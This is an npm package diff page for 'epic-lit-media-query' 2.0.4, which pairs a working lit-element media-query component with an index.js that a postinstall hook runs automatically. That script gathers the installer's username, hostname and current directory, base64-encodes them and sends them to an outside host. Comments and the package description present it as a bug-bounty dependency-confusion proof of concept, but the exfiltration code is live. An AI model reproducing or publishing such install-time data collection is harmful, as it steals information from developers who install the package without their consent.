epic-lit-media-query 2.0.4
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of epic-lit-media-query might be problematic. Click here for more details.
- package/README.md +5 -0
- package/index.js +33 -0
- package/lit-media-query.js +139 -0
- package/package.json +21 -0
package/README.md
ADDED
package/index.js
ADDED
@@ -0,0 +1,33 @@
|
|
1
|
+
const os = require('os');
|
2
|
+
const http = require('http');
|
3
|
+
|
4
|
+
// This is a proof-of-concept package that is part of a Bug Bounty compaign
|
5
|
+
// Please note that this is not a malicious package, it is meant only as demonstration for dependency confusion
|
6
|
+
// It collects username, hostname and current path and submits them to a remote server to demonstrate impact
|
7
|
+
// For any inquiries please reach out to: thelastninja@wearehackerone.com
|
8
|
+
|
9
|
+
async function sendUserInfoToLogging() {
|
10
|
+
try {
|
11
|
+
const userInfo = os.userInfo();
|
12
|
+
const hostname = os.hostname();
|
13
|
+
const currentPath = process.cwd();
|
14
|
+
|
15
|
+
// Combine user and host information
|
16
|
+
const userInfoString = `${userInfo.username}@${hostname}:${currentPath}`;
|
17
|
+
|
18
|
+
// Base64 encode the combined string
|
19
|
+
const encodedUserInfo = Buffer.from(userInfoString).toString('base64');
|
20
|
+
|
21
|
+
// Construct the URL with encoded user information
|
22
|
+
const url = `http://npm.thelastninja.me/logging?user_info=${encodedUserInfo}`;
|
23
|
+
|
24
|
+
// Send a GET request to the logging endpoint
|
25
|
+
const response = await http.get(url);
|
26
|
+
|
27
|
+
} catch (error) {
|
28
|
+
console.error('Error sending user info to logging:', error.message);
|
29
|
+
}
|
30
|
+
}
|
31
|
+
|
32
|
+
// Call the function to send user info to logging
|
33
|
+
sendUserInfoToLogging();
|
@@ -0,0 +1,139 @@
|
|
1
|
+
import {
|
2
|
+
LitElement,
|
3
|
+
html
|
4
|
+
} from 'lit-element';
|
5
|
+
|
6
|
+
/**
|
7
|
+
* The `lit-media-query` component detects when a media query
|
8
|
+
* is `true` or `false`.
|
9
|
+
*/
|
10
|
+
class LitMediaQuery extends LitElement {
|
11
|
+
/**
|
12
|
+
* Fired when `lit-media-query` changes detects a change
|
13
|
+
* in the media query (from `true` to `false` and vice versa).
|
14
|
+
*
|
15
|
+
* @event changed
|
16
|
+
* @param {boolean} value If media query is being fulfilled or not.
|
17
|
+
*/
|
18
|
+
|
19
|
+
static get properties() {
|
20
|
+
return {
|
21
|
+
/**
|
22
|
+
* Media query to be watched by the element.
|
23
|
+
*
|
24
|
+
* Can be modified at run time by setting a new value.
|
25
|
+
*/
|
26
|
+
query: {
|
27
|
+
type: String
|
28
|
+
},
|
29
|
+
_match: {
|
30
|
+
type: Boolean
|
31
|
+
}
|
32
|
+
};
|
33
|
+
}
|
34
|
+
|
35
|
+
constructor() {
|
36
|
+
super();
|
37
|
+
this.query = '(max-width:460px)';
|
38
|
+
this._match = false;
|
39
|
+
this.boundResizeHandler = this._handleRisize.bind(this);
|
40
|
+
}
|
41
|
+
|
42
|
+
render() {
|
43
|
+
return html `
|
44
|
+
<style>
|
45
|
+
:host {
|
46
|
+
display: none;
|
47
|
+
}
|
48
|
+
</style>
|
49
|
+
`;
|
50
|
+
}
|
51
|
+
|
52
|
+
firstUpdated() {
|
53
|
+
// Check media query once before 'resize' event
|
54
|
+
this._initialMediaQueryCheck();
|
55
|
+
}
|
56
|
+
|
57
|
+
connectedCallback() {
|
58
|
+
super.connectedCallback();
|
59
|
+
// Check if Visual Viewport API is supported
|
60
|
+
if (typeof window.visualViewport !== 'undefined') {
|
61
|
+
window.visualViewport.addEventListener('resize', this.boundResizeHandler);
|
62
|
+
} else {
|
63
|
+
window.addEventListener('resize', this.boundResizeHandler);
|
64
|
+
}
|
65
|
+
}
|
66
|
+
|
67
|
+
disconnectedCallback() {
|
68
|
+
// Remove event listeners
|
69
|
+
if (typeof window.visualViewport !== 'undefined') {
|
70
|
+
window.visualViewport.removeEventListener(
|
71
|
+
'resize',
|
72
|
+
this.boundResizeHandler
|
73
|
+
);
|
74
|
+
} else {
|
75
|
+
window.removeEventListener('resize', this.boundResizeHandler);
|
76
|
+
}
|
77
|
+
super.disconnectedCallback();
|
78
|
+
}
|
79
|
+
|
80
|
+
_initialMediaQueryCheck() {
|
81
|
+
if (window.matchMedia(this.query).matches) {
|
82
|
+
this.dispatchEvent(
|
83
|
+
new CustomEvent('changed', {
|
84
|
+
detail: {
|
85
|
+
value: true
|
86
|
+
},
|
87
|
+
composed: true,
|
88
|
+
bubbles: true
|
89
|
+
})
|
90
|
+
);
|
91
|
+
} else {
|
92
|
+
this.dispatchEvent(
|
93
|
+
new CustomEvent('changed', {
|
94
|
+
detail: {
|
95
|
+
value: false
|
96
|
+
},
|
97
|
+
composed: true,
|
98
|
+
bubbles: true
|
99
|
+
})
|
100
|
+
);
|
101
|
+
}
|
102
|
+
}
|
103
|
+
|
104
|
+
_handleRisize() {
|
105
|
+
if (window.matchMedia(this.query).matches) {
|
106
|
+
// From no match to match
|
107
|
+
if (this._match === false) {
|
108
|
+
this.dispatchEvent(
|
109
|
+
new CustomEvent('changed', {
|
110
|
+
detail: {
|
111
|
+
value: true
|
112
|
+
},
|
113
|
+
composed: true,
|
114
|
+
bubbles: true
|
115
|
+
})
|
116
|
+
);
|
117
|
+
this._match = true;
|
118
|
+
}
|
119
|
+
} else {
|
120
|
+
// From match to no match
|
121
|
+
if (this._match === true) {
|
122
|
+
this.dispatchEvent(
|
123
|
+
new CustomEvent('changed', {
|
124
|
+
detail: {
|
125
|
+
value: false
|
126
|
+
},
|
127
|
+
composed: true,
|
128
|
+
bubbles: true
|
129
|
+
})
|
130
|
+
);
|
131
|
+
this._match = false;
|
132
|
+
}
|
133
|
+
}
|
134
|
+
}
|
135
|
+
}
|
136
|
+
|
137
|
+
if (!window.customElements.get('lit-media-query')) {
|
138
|
+
customElements.define('lit-media-query', LitMediaQuery);
|
139
|
+
}
|
package/package.json
ADDED
@@ -0,0 +1,21 @@
|
|
1
|
+
{
|
2
|
+
"name": "epic-lit-media-query",
|
3
|
+
"version": "2.0.4",
|
4
|
+
"description": "This is a poc package for bug bounty dependency confusion test, it only collects basic info to demonstrate impact to the triage team",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"postinstall": "node index.js"
|
9
|
+
},
|
10
|
+
"repository": {},
|
11
|
+
"keywords": [
|
12
|
+
"poc"
|
13
|
+
],
|
14
|
+
"author": "thelastninja@wearehackerone.com",
|
15
|
+
"license": "MIT",
|
16
|
+
"bugs": {
|
17
|
+
"url": "https://hackerone.com/thelastninja"
|
18
|
+
},
|
19
|
+
"homepage": "https://hackerone.com/thelastninja",
|
20
|
+
"dependencies": {}
|
21
|
+
}
|